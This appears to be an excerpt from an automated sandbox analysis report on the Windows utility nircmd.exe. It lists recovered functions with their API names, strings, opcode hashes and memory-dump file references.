                                                                                                                                                          Function 0000000140004104 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 67stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strcat$memsetstrchrstrcpystrlen
                                                                                                                                                          • String ID: .url$\/:*?"<>|
                                                                                                                                                          • API String ID: 332718791-2798604190
                                                                                                                                                          • Opcode ID: 6a811986edfd7087174e284627d6177ade3f8963043a2d7532cfb7689771d243
                                                                                                                                                          • Instruction ID: af7658509a02034be8136cedc946db50c4d4b3ab71698071098308842990a299
                                                                                                                                                          • Opcode Fuzzy Hash: 6a811986edfd7087174e284627d6177ade3f8963043a2d7532cfb7689771d243
                                                                                                                                                          • Instruction Fuzzy Hash: BE218E7621868095EB62EB27E8407D977A0B78DBC4F584022FF8A0B7A6DB7DC545C701
                                                                                                                                                          Function 00000001400103CD Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiWide_wcsicmpmemset$InitializeUninitializeatoffree
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 534064660-0
                                                                                                                                                          • Opcode ID: c608701727323ea11da3200fc3b8ef3295e3934237a2d1d0b4761f078f748603
                                                                                                                                                          • Instruction ID: 174808a3cbe59758963839d646f7531bcd79934c5c5dab38a3149ec8d79d0d21
                                                                                                                                                          • Opcode Fuzzy Hash: c608701727323ea11da3200fc3b8ef3295e3934237a2d1d0b4761f078f748603
                                                                                                                                                          • Instruction Fuzzy Hash: 4231D372608BC185EB32EB52B4557EB6360F78C7D9F404225AB590BAE6DF3CC145D700
                                                                                                                                                          Function 0000000140013BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73registrystringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0000000140013C50
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$CloseLibraryLoadOpenQueryValueVersionmemsetstrcpy
                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                          • API String ID: 3830050946-2036018995
                                                                                                                                                          • Opcode ID: b341214d6a02dc29ca4703e04fc9b77b794385c3662a34221aec755c86aedded
                                                                                                                                                          • Instruction ID: a7194f0982357285e0634c35ce7e60dd7f73680f8a0e84455cdc9d27a1fbb07e
                                                                                                                                                          • Opcode Fuzzy Hash: b341214d6a02dc29ca4703e04fc9b77b794385c3662a34221aec755c86aedded
                                                                                                                                                          • Instruction Fuzzy Hash: 3B31A431204B8182EA729B16A4907DDA3A1F78D7C0F844121F7D90BAA5DF3AC545C780
                                                                                                                                                          Function 000000014000AA94 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharInitializeMessageMultiUninitializeWidememset
                                                                                                                                                          • String ID: Sound Devices
                                                                                                                                                          • API String ID: 2929421039-445005488
                                                                                                                                                          • Opcode ID: 51ef9afd1695b3256bef3cb8b80eecd1e125718681b8750997dd4ad79a59f5a3
                                                                                                                                                          • Instruction ID: 1762d24ed35a859a78b16384363ec94a42aafc63a9b47fbbbb78fca7af153b21
                                                                                                                                                          • Opcode Fuzzy Hash: 51ef9afd1695b3256bef3cb8b80eecd1e125718681b8750997dd4ad79a59f5a3
                                                                                                                                                          • Instruction Fuzzy Hash: CB31AE72214A8582EB129F26F4853EA77A1F789394F044236B3980B8E9DF7EC149CB00
                                                                                                                                                          Function 0000000140013188 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$ClassNamememset
                                                                                                                                                          • String ID: SysListView32$SysTreeView32
                                                                                                                                                          • API String ID: 1217931859-676203472
                                                                                                                                                          • Opcode ID: 5b2272ace8e513bdee1e37f5a7cf431634cb626a578be9f6b695b25ba8747e63
                                                                                                                                                          • Instruction ID: 1433966ddcc0db44f122e2b6acb9f638f7ef37b62fabd750da4959319ecac98f
                                                                                                                                                          • Opcode Fuzzy Hash: 5b2272ace8e513bdee1e37f5a7cf431634cb626a578be9f6b695b25ba8747e63
                                                                                                                                                          • Instruction Fuzzy Hash: 8501497130868291EB32AB16F9403D96765FB8D7C8F444131BB8D4F966EB3DC654C700
                                                                                                                                                          Function 0000000140013A84 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: SHEmptyRecycleBinA$SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                          • API String ID: 2238633743-3413488100
                                                                                                                                                          • Opcode ID: 618c94454c743255a98543869fecce06a422ef0b123db991adc24434af96371f
                                                                                                                                                          • Instruction ID: 18613bef642572ef21b1eba2afbe6f206cdd5da10a6fcfe79e2334e2543f49f4
                                                                                                                                                          • Opcode Fuzzy Hash: 618c94454c743255a98543869fecce06a422ef0b123db991adc24434af96371f
                                                                                                                                                          • Instruction Fuzzy Hash: 2FF09234605B41A0EA079B47E88479433F1EB4D7C0F801216E64D0B3B0EF7E8599C380
                                                                                                                                                          Function 0000000140013968 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 77COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: ServicesActive
                                                                                                                                                          • API String ID: 1452528299-3071072050
                                                                                                                                                          • Opcode ID: 37e65885bb8d5e5867b5a22a3507a5079b81474ce9a87c7b269556fbc94ba65b
                                                                                                                                                          • Instruction ID: 29442f53245169a938468189a4b00cbf4a81374868c4b4ac8d4e1e275533523c
                                                                                                                                                          • Opcode Fuzzy Hash: 37e65885bb8d5e5867b5a22a3507a5079b81474ce9a87c7b269556fbc94ba65b
                                                                                                                                                          • Instruction Fuzzy Hash: DB316131704B5086FB665B67A84479973A2AB8CFC4F884026FB8E4B774DF7EC8468701
                                                                                                                                                          Function 0000000140012788 Relevance: 9.1, APIs: 6, Instructions: 65stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: strchr$_stricmpmemsetstrcpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3870656766-0
                                                                                                                                                          • Opcode ID: 5409022923a1bf47ee229eacaea90966b8e25a92dcb8e206bbc289f70c28c826
                                                                                                                                                          • Instruction ID: 38c9761c50e30ac0a4cfa4d824e032ee2037c6c2aca636a6af7d6dbfc9dd6a82
                                                                                                                                                          • Opcode Fuzzy Hash: 5409022923a1bf47ee229eacaea90966b8e25a92dcb8e206bbc289f70c28c826
                                                                                                                                                          • Instruction Fuzzy Hash: F021C33160D18081FF779A27A5503FA13819B9DBC8F984021FB8D4F6EADA3EC4628721
                                                                                                                                                          Function 0000000140002D28 Relevance: 9.1, APIs: 6, Instructions: 54COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3197862061-0
                                                                                                                                                          • Opcode ID: 1b70405dff2aa8e781d6797f1174d88fd6bffd030006ea2f6a11eca3977ba8e8
                                                                                                                                                          • Instruction ID: f1c0acb8186055f8aaf9e821dacbf50ab36289ca587127e68a80cac79e17d5fe
                                                                                                                                                          • Opcode Fuzzy Hash: 1b70405dff2aa8e781d6797f1174d88fd6bffd030006ea2f6a11eca3977ba8e8
                                                                                                                                                          • Instruction Fuzzy Hash: 20116D766286408BD7198F36F414B4EBB61F388BD0F045224FA8B47B68DF3ED4058B00
                                                                                                                                                          Function 00000001400065C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassCreateHandleModuleRegisterWindowmemset
                                                                                                                                                          • String ID: NirCmdWinCls
                                                                                                                                                          • API String ID: 2001056077-2221025072
                                                                                                                                                          • Opcode ID: c35aa9cef76a5e4fa95ec54fa6256e36aa1291f4e602a1ef73f56c5dd2bc107a
                                                                                                                                                          • Instruction ID: b4743448f54363cf6df1e1bd232597144b022e3c5283ad4ad0b6799721f60ccb
                                                                                                                                                          • Opcode Fuzzy Hash: c35aa9cef76a5e4fa95ec54fa6256e36aa1291f4e602a1ef73f56c5dd2bc107a
                                                                                                                                                          • Instruction Fuzzy Hash: B8214972218B8497EB11CF25F44439AB7B0F38879AF544625E7884BA79DF7DC159CB00
                                                                                                                                                          Function 0000000140013210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ChildClassEnumNameWindows_stricmpmemset
                                                                                                                                                          • String ID: RegEdit_RegEdit
                                                                                                                                                          • API String ID: 168603426-157708615
                                                                                                                                                          • Opcode ID: e2d64b859f33b6bf282f42d889871db4404a11caeaee7772369b1c645d909d99
                                                                                                                                                          • Instruction ID: 8e8dbb6320a9b87bf48631a621144ac84e07f3bc07cf5168535b90af630181e3
                                                                                                                                                          • Opcode Fuzzy Hash: e2d64b859f33b6bf282f42d889871db4404a11caeaee7772369b1c645d909d99
                                                                                                                                                          • Instruction Fuzzy Hash: 04011E31208A4191EB22AB17E5443E963A1F74D7C8F544125EB894F9A9DF7EC584C701
                                                                                                                                                          Function 0000000140006F98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastMessagesprintf
                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                          • API String ID: 1670431679-1552265934
                                                                                                                                                          • Opcode ID: dcbea983486a26ec5732341c3a8adc85c34391d7621431c41dffdcf89e91b2fc
                                                                                                                                                          • Instruction ID: 4ddd83a302d7d53d73cd8ddaae2cf2e8eb3a932459d839aa78bf6b21c5cb14af
                                                                                                                                                          • Opcode Fuzzy Hash: dcbea983486a26ec5732341c3a8adc85c34391d7621431c41dffdcf89e91b2fc
                                                                                                                                                          • Instruction Fuzzy Hash: 0B015AB2304B8992EB25DB12E0407C963A1F74CBC4F848526EF9817729DF79C646CB80
                                                                                                                                                          Function 00000001400063D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                          • String ID: DllRegisterServer$DllUnregisterServer
                                                                                                                                                          • API String ID: 145871493-2931954178
                                                                                                                                                          • Opcode ID: 4a47dea57b914f909cc15eb698aa1325139753429319544cca445951130f468d
                                                                                                                                                          • Instruction ID: 231c55faadd0be2b90fe6360a896c111cbee24b7e59c363693c216e16d101d61
                                                                                                                                                          • Opcode Fuzzy Hash: 4a47dea57b914f909cc15eb698aa1325139753429319544cca445951130f468d
                                                                                                                                                          • Instruction Fuzzy Hash: FCF0A47161054092E7229B27F88439962A2B78CBD4F985230FB2E1B7B8CF38C885C740
                                                                                                                                                          Function 00000001400125E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 95stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandlestrcpy$OpenProcessVersionmemset
                                                                                                                                                          • String ID: :
                                                                                                                                                          • API String ID: 2803417046-336475711
                                                                                                                                                          • Opcode ID: 4442124bceb70b5b8e5e82b92eabe556ce03d5d0d7a74d74a4154d0a89007258
                                                                                                                                                          • Instruction ID: a28beef735b86818a4b5e5fdad714cf0e69cdb36956060ae73e10025575e6cca
                                                                                                                                                          • Opcode Fuzzy Hash: 4442124bceb70b5b8e5e82b92eabe556ce03d5d0d7a74d74a4154d0a89007258
                                                                                                                                                          • Instruction Fuzzy Hash: A0417E72208A8086EB72DB12E8443DA73A0F78C7C5F444126FB994B6E8DF7EC555CB10
                                                                                                                                                          Function 0000000140015CBD Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1426549593-0
                                                                                                                                                          • Opcode ID: f035ec0d080eeafeb37274a8e9f0ae0b737a707cfa6e24465fa535ab0cb5c37b
                                                                                                                                                          • Instruction ID: a22ed7371ef014c80cbe8b7c13af7a4fd5cf2f5e099063eaf0c8fdd12ca6d8f0
                                                                                                                                                          • Opcode Fuzzy Hash: f035ec0d080eeafeb37274a8e9f0ae0b737a707cfa6e24465fa535ab0cb5c37b
                                                                                                                                                          • Instruction Fuzzy Hash: 4D310531114A82CAE762AF56E4847D873B0F3483A5F50422AF76A4F2F5DB3AC949CB00
                                                                                                                                                          Function 000000014000A400 Relevance: 7.6, APIs: 5, Instructions: 54fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$??2@??3@CloseCreateHandleReadSizememcpy
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1679403186-0
                                                                                                                                                          • Opcode ID: 1ff4c9c1d114f484d3137a78287c3b43d3d4634c6d425184dbed76a913943ad2
                                                                                                                                                          • Instruction ID: c1e7359580e6ff75f84a98a052ea8a8d6dbf6e397b3bf86b1cb41a876bfd998d
                                                                                                                                                          • Opcode Fuzzy Hash: 1ff4c9c1d114f484d3137a78287c3b43d3d4634c6d425184dbed76a913943ad2
                                                                                                                                                          • Instruction Fuzzy Hash: 1B11847160464042FB19EB67B4043EAA391ABCEBE0F448624FB5947BF5DF7CC0058700
                                                                                                                                                          Function 0000000140015CA6 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                          • Opcode ID: 6787e7afebbb89bd0ae52149f33ccbbcdd98504c7f0d12bc2ff528407d37d055
                                                                                                                                                          • Instruction ID: 08797969772546be3f1f62d046ca1be72e16552c8cb4fef228ac25ca35d8891b
                                                                                                                                                          • Opcode Fuzzy Hash: 6787e7afebbb89bd0ae52149f33ccbbcdd98504c7f0d12bc2ff528407d37d055
                                                                                                                                                          • Instruction Fuzzy Hash: 3F21F231114A42C6EB22AF16E8847D873B0F3583A5F500216FB6A4F2F5DB3AC94AC700
                                                                                                                                                          Function 0000000140015CFE Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 352749199-0
                                                                                                                                                          • Opcode ID: 6787e7afebbb89bd0ae52149f33ccbbcdd98504c7f0d12bc2ff528407d37d055
                                                                                                                                                          • Instruction ID: 08797969772546be3f1f62d046ca1be72e16552c8cb4fef228ac25ca35d8891b
                                                                                                                                                          • Opcode Fuzzy Hash: 6787e7afebbb89bd0ae52149f33ccbbcdd98504c7f0d12bc2ff528407d37d055
                                                                                                                                                          • Instruction Fuzzy Hash: 3F21F231114A42C6EB22AF16E8847D873B0F3583A5F500216FB6A4F2F5DB3AC94AC700
